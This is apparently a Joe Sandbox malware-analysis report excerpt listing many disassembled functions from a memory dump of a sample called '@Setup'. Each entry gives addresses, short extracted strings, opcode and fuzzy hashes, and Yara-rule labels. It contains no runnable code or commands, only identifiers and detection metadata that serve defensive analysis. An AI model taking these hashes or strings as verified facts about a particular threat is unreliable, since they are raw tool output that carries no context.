                                                                                                                                                                                              • API String ID: 0-253969996
                                                                                                                                                                                              • Opcode ID: 950d7402485480fe5043ae326df5e941a9b7dffefcdfff4a21107514e64b3dfe
                                                                                                                                                                                              • Instruction ID: 7bb25be03b3b73daa9788f6158380f9074193ee75aa4c1863ee2137fb31b5ffc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 950d7402485480fe5043ae326df5e941a9b7dffefcdfff4a21107514e64b3dfe
                                                                                                                                                                                              • Instruction Fuzzy Hash: CFD10376A183118BD724CF28CC513ABB7E2EFD5310F088A2CE8959B3D4EB789945C791
                                                                                                                                                                                              Function 0092FD0E Relevance: 2.8, Strings: 2, Instructions: 341COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: lohi${rsp
                                                                                                                                                                                              • API String ID: 0-2839643115
                                                                                                                                                                                              • Opcode ID: a3250ad80699956cd847d09705c882b15188470c3c4633290d32ebebb13826ff
                                                                                                                                                                                              • Instruction ID: 731bb3ecbbb41c70ed2ca5e5c88eb88a81ff02f99516a02874a17bc75249d243
                                                                                                                                                                                              • Opcode Fuzzy Hash: a3250ad80699956cd847d09705c882b15188470c3c4633290d32ebebb13826ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 889136726093548BD328DB28E89066FB7E6EBD5304F29893CE4D687255DA30EC05CB92
                                                                                                                                                                                              Function 00909CEA Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: S<=2$d
                                                                                                                                                                                              • API String ID: 0-3247495960
                                                                                                                                                                                              • Opcode ID: 5d44fbd4020327f76e22b736ed821a1386312ea74f9885b916572f488ddec4a3
                                                                                                                                                                                              • Instruction ID: b35b9bcb65fd80a170642f8c3caf53301bd70f7f32960165af7adcd694c35d26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d44fbd4020327f76e22b736ed821a1386312ea74f9885b916572f488ddec4a3
                                                                                                                                                                                              • Instruction Fuzzy Hash: C691F372A183218BC724CF28C4D176BB7E2EFC9754F19892DE9C99B2A1E7748C40C746
                                                                                                                                                                                              Function 008F5ADE Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: )$IEND
                                                                                                                                                                                              • API String ID: 0-707183367
                                                                                                                                                                                              • Opcode ID: ef0f34d132798424f401911650e294954195f9754a0d2aba1af426546c6adb8f
                                                                                                                                                                                              • Instruction ID: 1eab4f3fb9bb8d8eb571dded7e80674e9b36bf6d710766622ea3bc0fea5a8962
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef0f34d132798424f401911650e294954195f9754a0d2aba1af426546c6adb8f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87D1ACB15087489FE720DF28C841B6ABBE4FF94314F14492DFA999B381D775D908CB92
                                                                                                                                                                                              Function 0091DA57 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @a$u
                                                                                                                                                                                              • API String ID: 0-583156259
                                                                                                                                                                                              • Opcode ID: 3129e3b7bb62805f1c8da881b8cdffdad1e39977844b090990bba48b8bd6c357
                                                                                                                                                                                              • Instruction ID: 946e6a94c1ea8e8bb2b0119880615d46b21a8e8a9df58c23c7011e1975e7a347
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3129e3b7bb62805f1c8da881b8cdffdad1e39977844b090990bba48b8bd6c357
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B81D17060D3C18FD729CF3984607EBBBD1AF96304F1889ADD0DA87282DB758546CB56
                                                                                                                                                                                              Function 0090800D Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 7$gfff
                                                                                                                                                                                              • API String ID: 0-3777064726
                                                                                                                                                                                              • Opcode ID: 0ffdb42d78c4c58d7fa8c062848f6ad05f867710567016b2c76d0dcc3bda7030
                                                                                                                                                                                              • Instruction ID: ce67aca6030648dac6848afb38304446a45ec8846fef279fd0418f17e338f08f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ffdb42d78c4c58d7fa8c062848f6ad05f867710567016b2c76d0dcc3bda7030
                                                                                                                                                                                              • Instruction Fuzzy Hash: DC913673B146118FD718CB28CC527AB77E6BBC4324F19C63DD495DB389EAB898068781
                                                                                                                                                                                              Function 0090C54F Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: CM$x3,-
                                                                                                                                                                                              • API String ID: 0-963954796
                                                                                                                                                                                              • Opcode ID: 4de653d71386804ff8eefce6173c6268b1ee3d72daab71427b5753f354fada18
                                                                                                                                                                                              • Instruction ID: 8b7665ae154822738cee740a0dfbd0bdf883d72196ab8405f23bc57307aa899c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4de653d71386804ff8eefce6173c6268b1ee3d72daab71427b5753f354fada18
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E915FB4910B009FC7249F39C996626BFF0FF0A310B448A5DE8D68BB95D335E416CB96
                                                                                                                                                                                              Function 0090E966 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: [U$_8Y
                                                                                                                                                                                              • API String ID: 0-1769107113
                                                                                                                                                                                              • Opcode ID: 597d8c6b4f52e3706818ec3a7eaeb64713eab8564aa5541b7d7cd49197d35a02
                                                                                                                                                                                              • Instruction ID: 39a18f06c8e67fe4b51692f8314ee54be71123e11de0072aeb2625b68f7ea678
                                                                                                                                                                                              • Opcode Fuzzy Hash: 597d8c6b4f52e3706818ec3a7eaeb64713eab8564aa5541b7d7cd49197d35a02
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8851DCB064C3508BD714DF25C86166BB7F2EFA2354F18996CE8C59B3A4E339C906C716
                                                                                                                                                                                              Function 00900A6E Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: J$]
                                                                                                                                                                                              • API String ID: 0-1719541227
                                                                                                                                                                                              • Opcode ID: 9a5cb20b35358285f9106b57737df75f46960ac4212b54fcc403659a9b7504ab
                                                                                                                                                                                              • Instruction ID: 23a9102f3fb08fbff429eab88a2acf859437b489543c7bf5939f016b16683988
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a5cb20b35358285f9106b57737df75f46960ac4212b54fcc403659a9b7504ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A611833A1C7908FD7248A7D88813AFBBD69BD5324F194A3ED8E8D73C1D57989058742
                                                                                                                                                                                              Function 0090AFEE Relevance: 2.7, Strings: 1, Instructions: 1444COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: gd
                                                                                                                                                                                              • API String ID: 0-565856990
                                                                                                                                                                                              • Opcode ID: 912b67ff688b1908850d0dfdb9d3d6dbb5e8fdad775615128f556e03d611a2ce
                                                                                                                                                                                              • Instruction ID: 9f9102d3255c61dcee7c15149e98cb0b8bfe76b8fec480ad93538476f099ffa0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 912b67ff688b1908850d0dfdb9d3d6dbb5e8fdad775615128f556e03d611a2ce
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5192F1766093419FE724CF25DC8276FBBE6ABD5304F28882CE585872A2D771DC45CB82
                                                                                                                                                                                              Function 008FFC33 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: c${L
                                                                                                                                                                                              • API String ID: 0-2217919563
                                                                                                                                                                                              • Opcode ID: 59793655f248d662b5dbaf65c2a1dae74dc1d35872327831223a3ad235feea0c
                                                                                                                                                                                              • Instruction ID: 5664c54a45ff6ac9659b48ce43f4856e2b1bf3579dd2b8e0eed70623171ab1cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 59793655f248d662b5dbaf65c2a1dae74dc1d35872327831223a3ad235feea0c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A51EF72A0C3D04BE725CB34C8913EFBBE2EBD5304F18493CD98A97286DA755A468742
                                                                                                                                                                                              Function 0091A87E Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 5B3@$dV3T
                                                                                                                                                                                              • API String ID: 0-261990991
                                                                                                                                                                                              • Opcode ID: 9672135063d689be0f5c0da4d90228940091206f365f4ce267bd247f00f7031f
                                                                                                                                                                                              • Instruction ID: 6723da09cc9d86d07686e29e72ae266e40fe09990d803813c3775ec6a2a900c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9672135063d689be0f5c0da4d90228940091206f365f4ce267bd247f00f7031f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8131DEB16483948FD3108F69888075FFBF6FBD6B04F149A2CE5D59B295C7B4C5428B0A
                                                                                                                                                                                              Function 00907A0F Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: >89>$L4
                                                                                                                                                                                              • API String ID: 0-1866230856
                                                                                                                                                                                              • Opcode ID: 0fbbfa1fb79903dbcd2077a86ff9f9f8dbe4afa07d22b75513baf1f08d5c0aac
                                                                                                                                                                                              • Instruction ID: ec4f41da15faf8963e8ca24a0e888b5bf0419256c319f10488c2c739d8d28d37
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fbbfa1fb79903dbcd2077a86ff9f9f8dbe4afa07d22b75513baf1f08d5c0aac
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE11E635B0C3409FD3708F54D8817AEF7A6EBD5324F288A3CE48957256DA31AD81C756
                                                                                                                                                                                              Function 009283BE Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                              • API String ID: 0-2967466578
                                                                                                                                                                                              • Opcode ID: e633b1edb0abaaa91c51916f6b4de4541011fbe2bf65ddbb0a63274da755d3b6
                                                                                                                                                                                              • Instruction ID: 23bae950d0aa93af4fd35cbe31973a75df48a60000667316757ded36e3fa4dbf
                                                                                                                                                                                              • Opcode Fuzzy Hash: e633b1edb0abaaa91c51916f6b4de4541011fbe2bf65ddbb0a63274da755d3b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: FD321E71A093608FD714CF28D880B6BBBE5EFD5310F188A2DE5D68B295DB74D805CB92
                                                                                                                                                                                              Function 008FEB2A Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: (P
                                                                                                                                                                                              • API String ID: 0-2012212641
                                                                                                                                                                                              • Opcode ID: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
                                                                                                                                                                                              • Instruction ID: 8267485a91fd1d4fb92d495b019f83a0e6d8c284601efcbd6f636eec55956834
                                                                                                                                                                                              • Opcode Fuzzy Hash: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3622FD7154D3C28AD331CF39C8907EABBE1EF96304F188AACD5D99B252C735450ACB96
                                                                                                                                                                                              Function 0091BB7E Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                              • Opcode ID: 53fd736524474ad33ed1137964103f274b05866b83c981b3d0cd11237d977ccc
                                                                                                                                                                                              • Instruction ID: d234c60dcc874227ee9a8ae5530206f047dfe2c4c09ad8b5346ac3adcce34c7c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 53fd736524474ad33ed1137964103f274b05866b83c981b3d0cd11237d977ccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F127B1B083495BD728CF28C4517ABBBDAAFC5310F18896DE89987382D734DD85C792
                                                                                                                                                                                              Function 0090A1C1 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Q230
                                                                                                                                                                                              • API String ID: 0-2812859321
                                                                                                                                                                                              • Opcode ID: 01a2ed763a1866f680d9b430654db650df8ee60e15691e714ed058bb45f0bd25
                                                                                                                                                                                              • Instruction ID: 52ce4fc7c5e5a9de904ce873f51c8ff0c6b73c0abfd5fbe27f8771aa2cc2a4ca
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01a2ed763a1866f680d9b430654db650df8ee60e15691e714ed058bb45f0bd25
                                                                                                                                                                                              • Instruction Fuzzy Hash: 509101756083128BC324CF68C8D12AAB7E1FFD4754F188A2DE8D98B3A0D7749D41CB82
                                                                                                                                                                                              Function 0092806E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Y
                                                                                                                                                                                              • API String ID: 0-3233089245
                                                                                                                                                                                              • Opcode ID: 9fc61b0ac9d87c127389de8a6fb9445ac985fe36a127472672b78f1c2fbc2652
                                                                                                                                                                                              • Instruction ID: 5b74c0df61975428e7403f54ef4eea93c10afb1fe0e38025d1985e11006bb2cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fc61b0ac9d87c127389de8a6fb9445ac985fe36a127472672b78f1c2fbc2652
                                                                                                                                                                                              • Instruction Fuzzy Hash: 59A1183110D7A18FD3149A38A88026FBFD2ABD6364F184E2CE4D1473D6DA79C94AC747
                                                                                                                                                                                              Function 0090F41E Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8
                                                                                                                                                                                              • API String ID: 0-4194326291
                                                                                                                                                                                              • Opcode ID: 52352b04d4314bbdbeb4d82f0d566753c49ebe34a20e49696560913b1abe149f
                                                                                                                                                                                              • Instruction ID: 454d6e5bf39106f1d293e9a1402f7e83ece3abc41587cce99e142ee3bbc2f951
                                                                                                                                                                                              • Opcode Fuzzy Hash: 52352b04d4314bbdbeb4d82f0d566753c49ebe34a20e49696560913b1abe149f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F71D223A499904BD738893C4C3127A6A934BD3330F2D8B7EE9F6877F5D55A89014341
                                                                                                                                                                                              Function 0092168E Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8
                                                                                                                                                                                              • API String ID: 0-4194326291
                                                                                                                                                                                              • Opcode ID: 3c4551cb3b845ef9165c766284d10fc4bf13f62165ee8ab3d29115217bf5583c
                                                                                                                                                                                              • Instruction ID: 13454183bb3feec4c3b5f3e9e232dfef70252ec7a9ec5e35396c40f1859d4aeb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c4551cb3b845ef9165c766284d10fc4bf13f62165ee8ab3d29115217bf5583c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40713727A499E047D3288A3C6C613BA7AC34BE3330F2DCB6DE9F68B3E5D55948559340
                                                                                                                                                                                              Function 0090BFCE Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: _
                                                                                                                                                                                              • API String ID: 0-701932520
                                                                                                                                                                                              • Opcode ID: b87519bb105d626b698f5eb6738d417ba7205d8309420faeafa33aa56a69b860
                                                                                                                                                                                              • Instruction ID: 6c7fc18cf6ebc334e9eb67686f77996cf636a3426b08f8f9e2530850b02c032f
                                                                                                                                                                                              • Opcode Fuzzy Hash: b87519bb105d626b698f5eb6738d417ba7205d8309420faeafa33aa56a69b860
                                                                                                                                                                                              • Instruction Fuzzy Hash: F0613C5520869009DB2DDF74849333BBAE6DF44308F2891BED995CFAABF538C153874A
                                                                                                                                                                                              Function 0092CFE1 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: ,1
                                                                                                                                                                                              • API String ID: 0-24929940
                                                                                                                                                                                              • Opcode ID: f2b4f3ae3be06eb16216056ebf896d58a8c233bf04d8ee201415c7f7bd2fa06e
                                                                                                                                                                                              • Instruction ID: 5fd3793f11c80e5e6c310bb8ac2ccf190cac0cfce4485776fbc95c68617f298b
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2b4f3ae3be06eb16216056ebf896d58a8c233bf04d8ee201415c7f7bd2fa06e
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF514975611A218BCB1CCF78DD9156EBBE2FB56300318497DC492DB366EB398812CB14
                                                                                                                                                                                              Function 0093009E Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                              • Opcode ID: b429fb324d769fb60b2ef32831e73699aca438cb2cb143be8f5d2cc4dec08d52
                                                                                                                                                                                              • Instruction ID: e99351f2d38151e65df082137662900e26989ecf4ad49958160d5fcab31439d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: b429fb324d769fb60b2ef32831e73699aca438cb2cb143be8f5d2cc4dec08d52
                                                                                                                                                                                              • Instruction Fuzzy Hash: 20412471A093109BD728CF64CC6577BBBE6FFC5314F08891CE5855B2A4E775A804CB82
                                                                                                                                                                                              Function 0092F26E Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                              • Opcode ID: 3987efdfb3614dfadd8c98f81b07eba9240f6c7519f9df5f6bd95a61ae3d1754
                                                                                                                                                                                              • Instruction ID: 9da46866735b498cfa4dcf6e7dbfed9041816b9885b69d41ae11a3664ad5ad7b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3987efdfb3614dfadd8c98f81b07eba9240f6c7519f9df5f6bd95a61ae3d1754
                                                                                                                                                                                              • Instruction Fuzzy Hash: A921CEB51093049FC310CF58E88066AB7FAFBCA368F14893CE5D987250D375A808CB96
                                                                                                                                                                                              Function 00919A5E Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
